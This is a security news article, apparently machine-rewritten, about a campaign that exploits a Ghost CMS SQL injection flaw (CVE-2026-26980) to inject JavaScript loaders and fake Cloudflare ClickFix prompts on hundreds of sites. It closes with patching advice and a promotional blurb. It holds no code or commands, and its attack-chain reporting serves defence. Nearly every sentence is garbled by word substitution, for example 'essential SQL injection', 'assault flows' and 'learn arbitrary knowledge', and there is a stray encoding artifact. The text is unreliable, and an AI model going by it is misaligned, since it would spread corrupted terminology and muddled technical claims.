A big-scale marketing campaign is exploiting a essential SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix assault flows.
The marketing campaign was found by XLab risk intelligence researchers at Chinese language cybersecurity firm Qianxin, who confirmed impression on greater than 700 domains, together with college portals, AI/SaaS corporations, media retailers, fintech companies, safety websites, and private blogs.
In accordance with the researchers, risk actors planted malicious code on the web sites of Harvard College, Oxford College, Auburn College, and DuckDuckGo.
Supply: XLab
Â
CVE-2026-26980 impacts Ghost 3.24.0 by means of 6.19.0, and permits unauthenticated attackers to learn arbitrary knowledge from the web site database, together with the admin API keys.
This key offers administration entry to customers, articles, and themes, and can be utilized to change article pages.
Though the repair for the difficulty was launched on February 19 in Ghost CMS model 6.19.1, many websites failed to put in the safety replace.
SentinelOne printed on February 27 particulars about CVE-2026-26980 being exploited in assaults and the way incidents may be detected. The researchers noticed no less than two distinct exercise clusters concentrating on susceptible Ghost websites, generally re-infecting the identical domains with totally different scripts after cleanup, or one cleansing the script of the opposite to inject its personal.
Supply: XLab
Assault chain
The assaults that XLab noticed start by exploiting CVE-2026-26980 to steal the admin API keys, after which use the elevated rights to inject malicious JavaScript into articles.
The JavaScript code is a light-weight loader that fetches second-stage code from the attacker’s infrastructure, which is basically a cloaking script that fingerprints guests to find out whether or not they qualify as targets.
Guests passing the verification are served a faux Cloudflare immediate loaded by way of an iframe on high of the article web page, which comprises the ClickFix lure.
Supply: XLab
The web page instructs victims to confirm that they’re human by pasting a supplied command on their Home windows command immediate, which drops a payload on their programs.
XLab has noticed a number of payloads being utilized in these assaults, together with DLL loaders, JavaScript droppers, and an Electron-based malware pattern named UtilifySetup.exe.
.jpg)
Supply: XLab
Mitigating the chance
Crucial plan of action for Ghost CMS web site directors is to improve to model 6.19.1 or later and rotate all keys used beforehand, as they might have been uncovered.
XLab supplied a listing of indicators of compromise (IoCs), together with injected scripts, so a radical assessment of the web sites is required to find and take away them.
The researchers suggest that web site homeowners preserve a 30-day document of admin API name logs to allow a dependable retrospective investigation.
Automated pentesting instruments ship actual worth, however they have been constructed to reply one query: can an attacker transfer by means of the community? They weren’t constructed to check whether or not your controls block threats, your detection guidelines hearth, or your cloud configs maintain.
This information covers the 6 surfaces you truly must validate.
